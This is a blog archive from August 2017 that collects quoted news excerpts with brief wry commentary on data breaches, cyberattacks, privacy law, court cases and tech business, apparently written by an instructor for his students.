Monday, August 21, 2017

Reads like the plot for a comedy.
Paul Sperry reports:
Federal authorities are investigating whether sensitive data was stolen from congressional offices by several Pakistani-American tech staffers and sold to Pakistani or Russian intelligence, knowledgeable sources say.
What started out 16 months ago as a scandal involving the alleged theft of computer equipment from Congress has turned into a national-security investigation involving FBI surveillance of the suspects.
Read more on NY Post.
[From the article: 
When the suspected IT workers couldn’t produce the missing invoiced equipment, sources say, they were removed from working on the computer network in early February.
During the probe, investigators found valuable government data that is believed to have been taken from the network and placed on offsite servers, setting off more alarms.  Some 80 offices were potentially compromised.
   For more than a decade, Awan, his wife, two relatives and a friend worked for 30 House Democrats.
   The Democrats who hired the five suspects apparently did a poor job vetting them.
   Most had relatively little IT experience.  Yet they hauled in a combined $4 million-plus over the past decade.  One, a former McDonald’s worker, was suddenly making as much as a chief of staff.
   Awan had access to Wasserman Schultz’s e-mails at both Congress and the DNC, where he had been given the password to her iPad.  After DNC e-mails and research files were stolen during the presidential election, Wasserman Schultz reportedly refused to turn over the server to the FBI and instead called in a private firm to investigate and ID the hackers.  The firm blamed the Russian government, while admitting, “We don’t have hard evidence.”  The corrupted DNC server, held in storage, still has not been examined by the FBI.


Dealing with hacking anywhere?   
Alex Berengaut of Covington & Burling analyzes some of the legal issues raised by the indictment of Marcus Hutchins (@malwaretechblog) for allegedly creating and conspiring to sell malware known as the Kronos banking trojan.  He writes, in part:
Since Hutchins’ indictment, commentators have questioned whether the creation and selling of malware—without actually using the malware—violates the two statutes under which Hutchins was charged: the Computer Fraud and Abuse Act and the Wiretap Act.[1]  It is likely that these issues will be litigated as the case unfolds.
But there is another question raised by the indictment: whether it violates Hutchins’ constitutional rights to charge him for his alleged conduct under any statute in this country.  Several circuits—including the Seventh Circuit, where Hutchins’ case will be heard—have recognized that the federal government cannot charge anyone, anywhere in the world irrespective of their connections to the United States.[2]  As the Second Circuit has put it, “[i]n order to apply extraterritorially a federal criminal statute to a defendant consistently with due process, there must be a sufficient nexus between the defendant and the United States so that such application would not be arbitrary and fundamentally unfair.”[3]
Read more on Covington & Burling Inside Privacy.


Perspective.  Why AI is finding a home in businesses? 
CenturyLink Using AI to Boost Sales Efficiency
   Working with a company called Conversica Inc. and its AI agent named Angie, CenturyLink Inc. can much more quickly work through the thousands of sales leads generated each month through a variety of sources to focus on the ones that can most quickly and effectively become sales and generate revenue.  Conversica's software-as-a-service AI offering has been so successful that for every $1 CenturyLink spends on the service, it generates $20 in revenue, according to a video you can watch here.
   Angie also gets smarter, Gerber says.  "What we call AI is actually a bunch of AIs and some real intelligence too," he comments.  "There is an AI that can interpret what is the best message to send, another focused on how to generate the best response, an AI that actually reads it [and interprets it], another AI that measures intent, and another that says what is the right way to respond."  


How would Martha Steward get her insider stick tips today? 
Guide to Social Media and Securities Laws
by on
Jay Baris and Bradley Berman, MOFO Jumpstarter, August 14, 2017.
“The growing use of social media has created challenges for federal securities regulators, who must enforce antifraud rules that were written at a time when the prevailing technology was the newspaper.  This Guide summarizes how regulation has evolved in the face of the growing use of social media.  Our guide discusses the principal areas of focus for SEC-reporting companies, registered investment advisers, registered investment companies, and registered broker-dealers that use social media.  Read our Guide to Social Media and the Securities Laws.”


Something to inspire my students.
40 Under 40

(Related).  Even better?
35 Innovators Under 35

Sunday, August 20, 2017

They don’t seem to have done much managing…
Shaun Wooler reports:
A computer geek with alleged links to global hacking group Anonymous has stolen patient data from an NHS appointment booking system.
The crook breached a private contractor’s security to access a database containing confidential records on up to 1.2million people.
SwiftQueue is paid by eight NHS trusts to manage a website, through which patients can book appointments with a GP, hospital or clinic.
They also operate terminals within waiting rooms, where patients can check-in upon arrival.
Read more on The Sun.
[From the article:
The source said the hack exploited weaknesses in SwiftQueue’s software, which should have been patched several years ago.
They claim to have downloaded the company’s entire database, containing 11million records, including passwords.
    The company said they do not hold patients’ medical records and passwords are encrypted.


A proper response!  Notice that the investigation is being directed by lawyers. 
From their web site, the following breach notification. According to their report to HHS, 266,123 patients were notified.
Notice of Data Breach
At Pacific Alliance Medical Center (PAMC), we understand that the confidentiality and security of medical and personal information is critically important, and we are committed to protecting it.  The purpose of this post is to notify patients and employees of a recent cyber incident that affected PAMC and may have resulted in a compromise of certain electronic files containing medical or personal information.
What Happened
On June 14, 2017, PAMC became aware that certain of its networked computer systems were being affected by a cyber incident.  PAMC suspects that the incident began on or shortly before that date.  Shortly after becoming aware of the issue, PAMC’s Information Technology Department completed a preliminary assessment and determined that certain networked computer systems had been infected by a computer virus that was encrypting (making unreadable) certain files on PAMC’s computer network.  PAMC promptly shut down its networked computer systems, initiated its incident response and recovery procedures, notified the Federal Bureau of Investigation, and began a forensic investigation under the direction of its counsel.  Since then, PAMC has decrypted (made readable again) the affected files and has taken action to restore the affected systems and prevent similar incidents from occurring.


Keeping up with the hackers or correcting omissions? 
Delaware Adds More Stringent Data Breach Notice Requirements
   Companies will be required to tell state residents affected by a data breach within 60 days and notify the state attorney general if a breach affects more than 500 residents.
   Medical and biometric data is included in the list of protected personal data for the first time in Delaware.
The new law also requires companies to provide a year of free credit monitoring services to any Delaware resident whose Social Security number is compromised in a breach.


Big Data Analytics.  It’s easier to remove a million watermarks than to remove just one.
Google shows how easy it is for software to remove watermarks from photos
Google’s research division today detailed just how easy it is for computer algorithms to bypass standard photo watermarking practices, stripping those images of copyright protection and making them vulnerable to reposting across the internet without credit.  The research, presented at a leading computer vision conference in Hawaii back in July, is described in detail in a paper titled, “On the Effectiveness of Visible Watermarks.”
   Dekel and Rubinstein say the core problem with current photo watermarking processes is the high level of consistency in style.  “We show that this consistency can be used to invert the watermarking process — that is, estimate the watermark image and its opacity, and recover the original, watermark-free image underneath,” the duo explain.  “This can all be done automatically, without any user intervention or prior information about the watermark, and by only observing watermarked image collections publicly available online.”   


It is possible to get technology right.  (Second only to McDonald’s, see the chart.)  Funny how often that requires other, non-technical changes.
Starbucks Teaches Silicon Valley a Lesson in Tech
There were plenty of reasons for skepticism when Starbucks rolled out its digital ordering system nationally in September 2015.  EBay had already rolled out a location-based system that recognized customers as they walked in the door.  Consumers were not particularly impressed; eBay eventually spun off its PayPal unit.  Apple Pay, meanwhile, was launched in 2014 as a faster, more secure method of payment.  Merchants weren’t enthused.  Many never activated the feature.
But Starbucks was still betting that its customers would jump at the chance to preorder coffee and food for pickup at a nearby store.
Sure enough, the company’s mobile order-and-pay feature has become a major hit, one more example of Starbucks’—and coffee’s—universal appeal.  The preorders have actually created bottlenecks at Starbucks’ counters, as pickups collide with in-store orders.  The company is rethinking store layouts and hiring preorder specialists to handle the demand.

(Related).
Americans Love Ordering Pizza on Facebook
The cutthroat U.S. restaurant industry is getting increasingly aggressive about technology, enlisting Facebook Inc. and Amazon.com Inc. in their race to make it easier for customers to order and pay for their food.
Last month, TGI Fridays began letting customers foot the bill using their Amazon accounts.  And pizza chains are locked in an escalating battle to adopt new ordering methods -- a contest that involves chat bots, voice-activated devices and social networks.
Papa John’s International Inc. went so far as to declare itself an “e-commerce company” this month after delivering surprisingly strong results.
   Customers, especially millennials, are no longer content to call up a pizza place and dictate an order over their phone.  And they don’t want to wait in line at the Starbucks register.


At some point, they should hire someone who knows how to run a bank.
Wells Fargo troubles shift from phony bank accounts to real ones
After paying customers millions of dollars for opening phony accounts they did not want, Wells Fargo & Co has said it is now grappling with the possibility it harmed customers by closing real accounts they needed, leaving them without access to funds.
   Some of the complaints described fraudulent deposits of unknown origin.  Others said they were victims of identity theft and Wells Fargo closed their accounts and refused to reopen them or open new ones.  One customer said the bank closed an account after a hacker changed personal information, and then Wells Fargo improperly sent funds to the wrong address.
The complaints had consistent themes of confusion about why accounts were frozen or closed, and reflected desperation over being unable to access money, as well as frustration over not getting help from Wells Fargo's customer service.
   Well Fargo's major competitors did not report similar issues or regulatory probes in their quarterly filings.

(Related).  Anticipating a huge decline in stock price?  That should get someone’s attention.
Wells Fargo & Target of Unusually Large Options Trading (WFC)
Wells Fargo & Company was the recipient of some unusual options trading activity on Thursday.  Traders acquired 27,464 put options on the stock.  This is an increase of approximately 155% compared to the average daily volume of 10,758 put options.


Perspective.  Has the pendulum swung too far?
Tech Censorship of White Supremacists Draws Criticism From Within Industry
The debate intensified over whether the growing number of tech companies that blocked white supremacists and a neo-Nazi website on the internet have gone too far, as a prominent privacy group questioned the power a few corporations have to censor.


Sometimes, advertisers can use current events creatively.

Saturday, August 19, 2017

Of course, they do.
Hackers Exploit Microsoft Word Auto-Updating Links To Install Spyware
A freelance security consultant and Handler at SANS Internet Storm Center has discovered a rather interesting exploit in Microsoft Word, one that allows an attacker to abuse the productivity program's ability to auto-update links.  This is a feature that is enabled by default—when you add links to external sources like URLs, World with automatically update them without any prompts.  Therein lies the issue.
   In this case, the Word files tries to access the malicious RTF file.  If it succeeds, it downloads a JavaScript payload.  According to Mertens, the link update is triggered without user interaction or without a prompt warning to the user that such an action will take place.


Getting serious about Cyber Security or merely politics?
CYBERCOM Just Got A Major Pentagon Promotion From The President
In a highly anticipated move, President Donald Trump announced on Aug. 18 that the U.S. Cyber Command would be elevated to the status of a “unified combatant command,” putting it on a par with the likes of Central Command and Special Operations Command.
   But its elevation by the president is the latest product of years of debates over how the United States should structure, support, and prioritize its cybersecurity operations — debates that will probably intensify now, rather than resolve themselves.
For example, Trump added in his statement that Defense Secretary James Mattis was looking into “the possibility of separating United States Cyber Command from the National Security Agency.”  Since its creation in 2009, CYBERCOM has lived under the NSA’s roof at Fort Meade, depended on NSA’s resources, and shared its commander with NSA, as well: The commanding officer of CYBERCOM has historically been the “dual hatted” NSA director.
There are plenty of pros and cons to a CYBERCOM-NSA split, most of which boil down to bureaucratic wranglings over who’s responsible for what and when.  But one issue that’s helped spur the divorce talk is the evolution of different missions for the two agencies.  NSA has historically operated as a “collection” entity, stealthily intercepting communications and hoovering up all the details in them.  CYBERCOM, on the other hand, has been trying its hand as a “disruption” entity, taking offensive actions against hackers and enemies.  It’s hard to run both kinds of ops on a single target through a single point of entry.


I haven’t made many comments about the capability of satellite imaging recently.  Apparently, at least one company has found even commercial grade images adequate for its purpose.
Roofr uses satellite imagery to evaluate the state of your roof
Roofr, which will be graduating from Y Combinator (YC) next week, developed a satellite imagery software that analyzes the state of your roof to determine whether it needs to be replaced.
   The Toronto-based startup offers customers a free online quote using its satellite imagery software, which takes the square footage and slope of the roof.  It is currently using a Google API to capture satellite images from Google Earth.
The team then connects customers with vetted contractors who provide full replacements for any type of roof, including cedar, slate, and metal.


Another step towards replacing lawyers with AI?  (Are you sure that’s a human Judge on the other end?) 
Chinese 'cyber-court' launched for online cases
China has launched a digital "cyber-court" to help deal with a rise in the number of internet-related claims, according to state media.
The Hangzhou Internet Court opened on Friday and heard its first case - a copyright infringement dispute between an online writer and a web company.
Legal agents in Hangzhou and Beijing accessed the court via their computers and the trial lasted 20 minutes.
The court's focus will be civil cases, including online shopping disputes.
Judges were sworn in and the first case was presented on a large screen in the courtroom.
   Defendants and plaintiffs appear before the judge not in person, but via video-chat.
   In some other countries, online portals to allow people to resolve legal disputes in cyber-space already exist.
Canada's Civil Resolution Tribunal starting accepting claims for $5,000 (£3,000) or less in British Columbia in June.


Perspective.  Because they succeeded they must be cheating? 
The walls are closing in on tech giants
Tech behemoths Google, Facebook and Amazon are feeling the heat from the far-left and the far-right, and even the center is starting to fold.
Why it matters: Criticism over the companies' size, culture and overall influence in society is getting louder as they infiltrate every part of our lives.  Though it's mostly rhetoric rather than action at the moment, that could change quickly in the current political environment.
Here's a breakdown of the three biggest fights they're facing.

(Related).  Is it really so hard to start a new company?
Trapped in Tech’s Unicorn Land
The land of unicorns looks considerably less magical these days.
Not that private investors have noticed. The IPO market remains anemic for technology companies, and the M&A market isn’t faring that much better.  Yet investors continue to pour money into venture-capital firms, and those firms continue to pour money into technology startups—even the so-called unicorns valued at more than $1 billion.


This has got to be better than forcing everyone in the room to listen to the entire score of Der Ring des Nibelungen each time you get a call.  (Okay, maybe not numbers 5 and 8)

Friday, August 18, 2017

It seems that Security is never considered when using a new technology.  Is there some assumption that someone else will take care of all that “Security Stuff?”  Also, what makes anyone believe that a password is sufficient security? 
A leading US supplier of voting machines confirmed on Thursday that it exposed the personal information of more than 1.8 million Illinois residents.
State authorities and the Federal Bureau of Investigation were alerted this week to a major data leak exposing the names, addresses, dates of birth, partial Social Security numbers, and party affiliations of over a million Chicago residents.  Some driver’s license and state ID numbers were also exposed.
Jon Hendren, who works for the cyber resilience firm UpGuard, discovered the breach on an Amazon Web Services (AWS) device that was not secured by a password.  The voter data was then downloaded by cyber risk analyst Chris Vickery who determined Election Systems & Software (ES&S) controlled the data. ES&S provides voting machines and services in at least 42 states.


Perfect for my Software Assurance class.
Well, this sounds like an epic FAIL on the City of Yonker’s part, doesn’t it?
City of Yonkers – Information Technology (Westchester County)
The IT department’s acceptable computer use policy was not signed or acknowledged by all employees and city officials have also not classified personal, private and sensitive information based on its level of sensitivity and the potential impact should that data be disclosed, altered or destroyed without authorization.  In addition, city officials have not ensured that employees received adequate cyber security training and have not adopted a breach notification policy or a disaster recovery plan.
You can access the full report here (.pdf).


Gosh, you don’t think the government would lie do you?  (Me too!) 
Dems want independent probe into FCC cyberattack
Democratic lawmakers are calling for an independent investigation into how the Federal Communications Commission responded to a reported cyberattack in May that crippled the agency’s comment filing system.
Sen. Brian Schatz (D-Hawaii) and Rep. Frank Pallone Jr. (D-N.J.) sent a letter to the Government Accountability Office (GAO) on Thursday that cast doubt on the FCC’s version of the incident.
“While the FCC and the FBI have responded to Congressional inquiries into these [distributed denial of service] attacks, they have not released any records or documentation that would allow for confirmation that an attack occurred, that it was effectively dealt with, and that the FCC has begun to institute measures to thwart future attacks and ensure the security of its systems,” the letter reads.
“As a result, questions remain about the attack itself and more generally about the state of cybersecurity at the FCC — questions that warrant an independent review.”


Perspective.  A partial list of victims.
NotPetya Attack Costs Big Companies Millions


Obvious security? 
Facebook Awards $100,000 Prize for Spear-Phishing Detection Method
   To test their method, the researchers analyzed more than 370 million emails received by a large enterprise’s employees between March 2013 and January 2017.
The first part of the detection method relies on the analysis of two key components: domain reputation features and sender reputation features.  The domain reputation feature involves analyzing the link included in an email to see if it poses a risk.  A URL is considered risky if it has not been visited by many employees from within an organization, or if it has never been visited until very recently.
The sender reputation feature aims to identify spoofing of the sender’s name in the From header, a previously unseen attacker using a name and email address closely resembling a known or authoritative entity, exploitation of compromised user accounts, and suspicious email content (i.e. messages that reference accounts and credentials, or ones that invoke a sense of urgency).


If it’s good enough for Russia…
Natalia Gulyaeva, Maria Sedykh, and Bret Cohen write:
On 31 July, the Russian data protection authority, Roskomnadzor, issued guidance for data operators on the drafting of privacy policies to comply with Russian data protection law.  Russia’s 2006 privacy law – Federal Law No. 152-FZ of 27 July 2006 “On Personal Data” (Personal Data Law) – requires, among other things, that Russian data operators must adopt a privacy policy that describes how they process personal data.  This notice requirement is similar to the approach in Europe.  Furthermore, data operators shall publish such a policy online when personal data is collected online or otherwise provide unrestricted access to the policy when personal data is collected offline.  The guidance – although non-binding and recommendatory in nature – emphasizes the regulator’s compliance expectations and should therefore be taken into account by organizations acting as data operators in Russia.


How to write Terms of Service?  More important: How to read them! 
2nd Circuit’s Uber arbitration ruling huge win for app industry
On Thursday, the 2nd U.S. Circuit Court of Appeals ruled that Uber user Spencer Meyer assented to the company’s mandatory arbitration requirement when he clicked a button to complete his registration for the Uber smartphone app.  The 2nd Circuit’s decision, written by Judge Denny Chin for a panel that also included Judges Reena Raggi and Susan Carney, rejected Meyer's argument that he wasn’t on fair notice of the arbitration provision because the Uber registration process presented the app’s terms of service only via hyperlink.  
That's great news for companies with smartphone apps – and not just because the court held that app purchasers can be bound by a “sign-in wrap” that folds assent to terms of service into registration for the app.  The 2nd Circuit also confirmed the obvious: Now that Internet-connected devices have become nearly ubiquitous, smartphone users ought to know that registering for an app has legal consequences.


A project for my students.
Algorithmic Transparency for the Smart City
by on
Brauneis, Robert and Goodman, Ellen P., Algorithmic Transparency for the Smart City (August 2, 2017).  Available at SSRN: https://ssrn.com/abstract=3012499
“Emerging across many disciplines are questions about algorithmic ethics – about the values embedded in artificial intelligence and big data analytics that increasingly replace human decision making.  Many are concerned that an algorithmic society is too opaque to be accountable for its behavior.  An individual can be denied parole or denied credit, fired or not hired for reasons she will never know and cannot be articulated.  In the public sector, the opacity of algorithmic decision making is particularly problematic both because governmental decisions may be especially weighty, and because democratically-elected governments bear special duties of accountability.  Investigative journalists have recently exposed the dangerous impenetrability of algorithmic processes used in the criminal justice field – dangerous because the predictions they make can be both erroneous and unfair, with none the wiser.  We set out to test the limits of transparency around governmental deployment of big data analytics, focusing our investigation on local and state government use of predictive algorithms.  It is here, in local government, that algorithmically-determined decisions can be most directly impactful.  And it is here that stretched agencies are most likely to hand over the analytics to private vendors, which may make design and policy choices out of the sight of the client agencies, the public, or both.  To see just how impenetrable the resulting “black box” algorithms are, we filed 42 open records requests in 23 states seeking essential information about six predictive algorithm programs.  We selected the most widely-used and well-reviewed programs, including those developed by for-profit companies, nonprofits, and academic/private sector partnerships.  The goal was to see if, using the open records process, we could discover what policy judgments these algorithms embody, and could evaluate their utility and fairness.  To do this work, we identified what meaningful “algorithmic transparency” entails.  We found that in almost every case, it wasn’t provided.  Over-broad assertions of trade secrecy were a problem.  But contrary to conventional wisdom, they were not the biggest obstacle.  It will not usually be necessary to release the code used to execute predictive models in order to dramatically increase transparency.  We conclude that publicly-deployed algorithms will be sufficiently transparent only if (1) governments generate appropriate records about their objectives for algorithmic processes and subsequent implementation and validation; (2) government contractors reveal to the public agency sufficient information about how they developed the algorithm; and (3) public agencies and courts treat trade secrecy claims as the limited exception to public disclosure that the law requires.  Although it would require a multi-stakeholder process to develop best practices for record generation and disclosure, we present what we believe are eight principal types of information that such records should ideally contain.”


Keeping my students busy.


For my Geeks.


A reminder.


Last chance to get eclipse glasses?
Community College of Denver Solar Eclipse Party
Community College of Denver will be setting up two telescopes to safely view the 93% partial solar eclipse on August 21st.  One telescope is a Coronado Solarmax 60mm with an H-alpha solar filter, the other is a 6" Celestron scope with a broadband solar filter.  Safe viewing glasses provided.

Thursday, August 17, 2017

They purchased a company with less than perfect security and paid an additional price for that mistake. 
Shipping company Maersk says June cyberattack could cost it up to $300 million
Container shipping company A.P. Moller Maersk on Tuesday said it expects that computer issues triggered by the NotPetya cyberattack will cost the company as much as $300 million in lost revenue.
"In the last week of the [second] quarter we were hit by a cyber-attack, which mainly impacted Maersk Line, APM Terminals and Damco," Maersk CEO Soren Skou said in a statement.  "Business volumes were negatively affected for a couple of weeks in July and as a consequence, our Q3 results will be impacted.  We expect that the cyber-attack will impact results negatively by USD 200-300m."
Maersk Line was able to take bookings from existing customers two days after the attack, and things gradually got back to normal over the following week, the company said.  It said it did not lose third-party data as a result of the attack.


A change is coming.  Is that good or bad?
Privacy and Court Records: Online Access and the Loss of Practical Obscurity
by on
Ardia, David S., Privacy and Court Records: Online Access and the Loss of Practical Obscurity (August 4, 2017).  University of Illinois Law Review, Vol. 2017, No. 5, 2017.  Available at SSRN: https://ssrn.com/abstract=3013704
“Court records present a conundrum for privacy advocates.  Public access to the courts has long been a fundamental tenant of American democracy, helping to ensure that our system of justice functions fairly and that citizens can observe the actions of their government.  Yet court records contain an astonishing amount of private and sensitive information, ranging from social security numbers to the names of sexual assault victims.  Until recently, the privacy harms that attended the public disclosure of court records were generally regarded as insignificant because court files were difficult to search and access.  But this “practical obscurity” is rapidly disappearing as the courts move from the paper-based world of the twentieth century to an interconnected, electronic world where physical and temporal barriers to information are eroding.  These changes are prompting courts — and increasingly, legislatures — to reconsider public access to court records.  Although this reexamination can be beneficial, a number of courts are abandoning the careful balancing of interests that has traditionally guided judges in access disputes and instead are excluding whole categories of information, documents, and cases from public access.  This approach, while superficially appealing, is contrary to established First Amendment principles that require case-specific analysis before access can be restricted and is putting at risk the public’s ability to observe the functioning of the courts and justice system.  This article pushes back against the categorical exclusion of information in court records.  In doing so, it makes three core claims.  First, the First Amendment provides a qualified right of public access to all court records that are material to a court’s exercise of its adjudicatory power.  Second, before a court can restrict public access, it must engage in a case-specific evaluation of the privacy and public access interests at stake.  Third, per se categorical restrictions on public access are not permissible.  These conclusions do not leave the courts powerless to protect privacy, as some scholars assert.  We must discard the notion that the protection of privacy is exclusively the job of judges and court staff.  Instead, we need to shift the responsibility for protecting privacy to lawyers and litigants, who should not be permitted to include highly sensitive information in court files if it is not relevant to the case.  Of course, we cannot eliminate all private and sensitive information from court records, but as long as courts continue to provide physical access to their records, the First Amendment does not preclude court administrators from managing electronic access in order to retain some of the beneficial aspects of practical obscurity.  By minimizing the inclusion of unnecessary personal information in court files and by limiting the extent of electronic access to certain types of highly sensitive information, we can protect privacy while at the same time ensuring transparency and public accountability.”


Do they blame the Russians?  Partly. 
Partisanship, Propaganda, and Disinformation: Online Media and the 2016 U.S. Presidential Election
by on
“The Berkman Klein Center for Internet & Society at Harvard University today released a comprehensive analysis of online media and social media coverage of the 2016 presidential campaign.  The report, “Partisanship, Propaganda, and Disinformation: Online Media and the 2016 U.S. Presidential Election,” documents how highly partisan right-wing sources helped shape mainstream press coverage and seize the public’s attention in the 18-month period leading up to the election.
“In this study, we document polarization in the media ecosystem that is distinctly asymmetric.  Whereas the left half of our spectrum is filled with many media sources from center to left, the right half of the spectrum has a substantial gap between center and right.  The core of attention from the center-right to the left is large mainstream media organizations of the center-left.  The right-wing media sphere skews to the far right and is dominated by highly partisan news organizations,” co-author and principal investigator Yochai Benkler stated.  In addition to Benkler, the report was authored by Robert Faris, Hal Roberts, Bruce Etling, Nikki Bourassa, and Ethan Zuckerman.
The fact that media coverage has become more polarized in general is not new, but the extent to which right-wing sites have become partisan is striking, the report says.  The study found that on the conservative side, more attention was paid to pro-Trump, highly partisan media outlets.  On the liberal side, by contrast, the center of gravity was made up largely of long-standing media organizations.  Robert Faris, the Berkman Klein Center’s research director, noted, “Consistent with concerns over echo chambers and filter bubbles, social media users on the left and the right rarely share material from outside their respective spheres, except where they find coverage that is favorable to their choice of candidate.  A key difference between the right and left is that Trump supporters found substantial coverage favorable to their side in left and center-left media, particularly coverage critical of Clinton.  In contrast, the messaging from right-wing media was consistently pro-Trump.”  Conservative opposition to Trump was strongest in the center-right, the portion of the political spectrum that wielded the least influence in media coverage of the election.  In this recently-emerged universe, Breitbart stands at the center of a right-wing media ecosystem and is surrounded by sites like Fox News, the Daily Caller, the Gateway Pundit, the Washington Examiner, Infowars, Conservative Treehouse, and Truthfeed, according to the report’s analysis.”


I’ve been trying to tell my International students about the rules of discovery.  They seem to find it a very difficult concept.
Waymo v. Uber: Judge says Uber lawyers ‘misled the court,’ wants to tell jurors so
Waymo may get an edge over rival Uber as the two head into an explosive trade secrets trial this fall after a federal judge on Wednesday said he’ll likely tell the jury how Uber’s lawyers “misled the court” and repeatedly failed to produce documents that could be important in the case. 
   Uber’s lawyers from Morrison & Foerster recently disclosed that their firm has some information taken from Levandowski’s electronic devices.  Waymo is convinced that information contains stolen documents, which it says Uber’s team spent months hiding from the court.
“Wrong,” Uber’s lawyer, Arturo Gonzalez, said Wednesday.  His firm has some information, he said, but not the allegedly stolen documents.
But U.S. District Judge William Alsup, who is presiding over the case, seemed to side with Waymo.
“I am concerned that Mr. Gonzalez failed to disclose that he had the documents and took a long time to come clean,” Alsup said.  “Maybe he can get on the stand and explain it away.  But I am inclined … to tell the jury exactly this scenario: that he was ordered to come clean, did not come clean, ordered to come clean again, and did not come clean — finally in June or July came clean.”


Might be amusing.
An Augmented Reality Hackathon for Teachers
Earlier this week I shared some ideas for creating and using your own augmented reality experiences in school.  Metaverse is the free platform that makes it possible for teachers and students to create their own augmented reality experiences.  If you haven't tried it yet, I highly recommend taking a crack at making your own augmented reality experience.  As some participants in my workshops this summer demonstrated, you really can create your own augmented reality experiences in as little as ten minutes.  Of course, the more time you spend using Metaverse, the more complex and robust you can make your augmented reality applications.
This weekend Metaverse is kicking-off a hackathon for teachers.  The Metaverse Hackathon starts on Saturday, August 19th and runs through Saturday, August 26th.  The purpose of the hackathon is to showcase the creative augmented reality experiences that teachers make for educational uses.  The winner of the Metaverse Hackathon will receive $200 in classroom supplies.  You can get all of the details and register for the Metaverse Hackathon here.  I can't wait to see what everyone creates.


Perspective.  Is this the start of something?   
How artists can (finally) get paid in the digital age


For all my students.
   everyone should check out Wolfram Alpha’s Problem Generator.  But every dumbfounded student knows that you need more than one lasso to tame the perils of mathematics… so enter Symbolab Math Solver.
   Symbolab is meant to be a search engine for discovering the meaning of an equation, and it helps you do that not with search keywords but with mathematical symbols.
   The step-by-step solution helps you work through the explanation.  You have the option to hide the steps and work through it on your own.  Here are some key features:
  • The engine has more than 300 calculators. You can use the calculators (and graphing calculators) to solve a variety of equations and download the results in PDF.
  • Pick a topic and practice math equations. You can choose from pre-algebra, matrices, vectors, functions, exponents, trigonometry, calculus, and word problems.
  • Test yourself with quizzes. Check your progress with the quizzes on the site and also make your own.
  • Download PDF Cheatsheets. Print them and carry them around for handy reference (not to cheat during your exams).
  • Save your work in an online notebook. Register for an account and save your practice problems in a personal notebook.
  • Create groups. Make your own group and interact with other students.


I’m beginning to think this is for real!
   MoviePass has actually been around for several years, but high prices and countless restrictions have prevented it from really taking off.  But that may all be about to change…
MoviePass is now offering unlimited movies in theaters for $9.95-per-month.  The only restrictions are that you’re limited to one film every day, and 3D and IMAX movies are off the menu entirely.  But beyond that it’s anything goes.  Which sounds too good to be true, to be honest.
How it works is that you pay MoviePass $9.95 every month via a debit card.  You then visit your local movie theater as usual, but MoviePass will pay for your ticket.  If you go once a month you’ll just about break even, but if you go more often than that you’ll be saving some serious cash.
This could be a win-win for everyone involved.  However, according to Variety, AMC is already trying to prevent MoviePass subscriptions from being used at its theaters.  The chain claims the pricing makes this an unsustainable model which will harm the movie business in the long run.

Wednesday, August 16, 2017

This nearly 500-page draft kind of sums everything up neatly.
NIST – Security and Privacy Controls for Information Systems and Organizations
by on
This publication provides a catalog of security and privacy controls for federal information systems and organizations to protect organizational operations and assets, individuals, other organizations, and the Nation from a diverse set of threats including hostile attacks, natural disasters, structural failures, human errors, and privacy risks.  The controls are flexible and customizable and implemented as part of an organization-wide process to manage risk.  The controls address diverse requirements derived from mission and business needs, laws, Executive Orders, directives, regulations, policies, standards, and guidelines.  The publication describes how to develop specialized sets of controls, or overlays, tailored for specific types of missions and business functions, technologies, environments of operation, and sector-specific applications.  Finally, the consolidated catalog of controls addresses security and privacy from a functionality perspective (i.e., the strength of functions and mechanisms) and an assurance perspective (i.e., the measure of confidence in the security or privacy capability).  Addressing both functionality and assurance ensures that information technology products and the information systems that rely on those products are sufficiently trustworthy.” 


Helping my students understand the need to design security and privacy into systems from the beginning.  And to provide some kind of Metric as part of the design! 
Uber Settles FTC Allegations that It Made Deceptive Privacy and Data Security Claims
Uber Technologies, Inc. has agreed to implement a comprehensive privacy program and obtain regular, independent audits to settle Federal Trade Commission charges that the ride-sharing company deceived consumers by failing to monitor employee access to consumer personal information and by failing to reasonably secure sensitive consumer data stored in the cloud.


“We don’t care about this case, but…”
Apple, Facebook, Google and other tech giants tell the Supreme Court to protect cellphone data in a key, upcoming case
   The case before the nation’s justices is Carpenter vs. United States, and it stems from a 2011 investigation into a series of robberies in Detroit.  As part of the probe, law enforcement officials obtained information from nearby cell towers to determine the whereabouts of one of the suspects, Timothy Carpenter, without first obtaining a warrant.
As the Supreme Court considers the matter — including questions as to whether law enforcement must demonstrate probable cause before it can seek that location data — tech giants stressed in a new amicus brief that they “do not take a position on the outcome of this case.”
But the major players that signed it — including Airbnb, Cisco, Dropbox and Verizon, the only telecom giant to sign — do argue the need for greater Fourth Amendment safeguards “to ensure that the law realistically engages with Internet-based technologies and with people’s expectations of privacy in their digital data.”  


I want to play the “sound of doom” when my students open their exams.  Is that cruel?  I certainly hope so!
   The YouTube Audio Library launched in 2013 with 1,000+ free musical tracks.
   The channel now hosts more than five times that initial number.  All are high-quality 320 Kbps audio tracks and sound effects with a royalty-free license.


Another way to bug my students?


For the Movie Club. 
Ticket prices too high? MoviePass gets you into theaters for $10 a month
   even if audiences are currently fed up with the movie industry, a company called MoviePass is betting it can get them back in the seats, offering a movie a day for only $10 per month.
Founded in 2011, MoviePass is a subscription service that allows users to see movies in theaters (one movie per day) without buying a ticket each time.  Instead, the company pays for your ticket when you swipe your MoviePass card.
If it sounds crazy that a company could afford to let users watch movies every day for only $10 a month, it’s not.  The idea was similar to insurance: Not every user will actually see $10 worth of movies a month, so they end up subsidizing the users who do.
An iPhone or an Android phone is required to use MoviePass.


Because research should be cheap?  No doubt it’s the paid opinion that will sink your case. 
Free Law Project – We Have Every Free PACER Opinion on CourtListener.com
by on
“At Free Law Project, we have gathered millions of court documents over the years, but it’s with distinct pride that we announce that we have now completed our biggest crawl ever.  After nearly a year of work, and with support from the U.S. Department of Labor and Georgia State University, we have collected every free written order and opinion that is available in PACER.  To accomplish this we used PACER’s “Written Opinion Report,” which provides many opinions for free.  This collection contains approximately 3.4 million orders and opinions from approximately 1.5 million federal district and bankruptcy court cases dating back to 1960.  More than four hundred thousand of these documents were scanned and required OCR, amounting to nearly two million pages of text extraction that we completed for this project.  All of the documents amassed are available for search in the RECAP Archive of PACER documents and via our APIs.  New opinions will be downloaded every night to keep the collection up to date.”


So that’s where my students got the idea!

Tuesday, August 15, 2017

Continuing our discussion of management decisions that were (or should have been) obviously wrong. 
Costco made $3.7 million selling ‘Tiffany’ rings. Now it must pay $19 million to the real Tiffany.
Costco must pay the storied jewelry company Tiffany & Co. more than $19 million for selling about 2,500 diamond rings falsely identified on store signs as “Tiffany” rings, a federal judge ruled Monday.
